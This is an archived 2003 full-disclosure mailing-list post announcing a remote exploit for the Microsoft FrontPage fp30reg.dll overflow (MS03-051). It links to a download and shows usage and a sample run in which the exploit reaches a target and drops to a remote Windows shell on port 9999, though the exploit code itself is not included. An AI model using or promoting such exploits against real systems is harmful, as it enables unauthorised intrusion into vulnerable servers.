[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1068747279.3fb3ca0f50b33@mail.hotmail.kg>
Date: Thu, 13 Nov 2003 23:14:39 +0500 (KGT)
From: Adik <netninja@...mail.kg>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: [Exploit]: Microsoft FPSE fp30reg.dll Overflow Remote Exploit (MS03-051)
Hello folks,
If anyone is interested in an exploit for recently announced FPSE fp30reg.dll
overflow bug (MS03-051) by Brett Moore, u can pick it up at
http://netninja.to.kg
---- fp30reg.dll overflow -------
C:\fp30reg
-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver 0.1 }=-
by Adik < netmaniac [at] hotmail.KG >
http://netninja.to.kg
Usage: fp30reg [Target] <port>
eg: fp30reg.exe 192.168.63.130
C:\>fp30reg 192.168.63.130
-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver 0.1 }=-
by Adik < netmaniac [at] hotmail.KG >
http://netninja.to.kg
[*] Target: 192.168.63.130 Port: 80
[*] Socket initialized...
[*] Checking for presence of fp30reg.dll... Found!
[*] Packet injected!
[*] Sleeping . . . . . . . . . . . . .
[*] Connecting to host: 192.168.63.130 on port 9999
[*] Dropping to shell...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
------------
CHeerz,
Adik
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists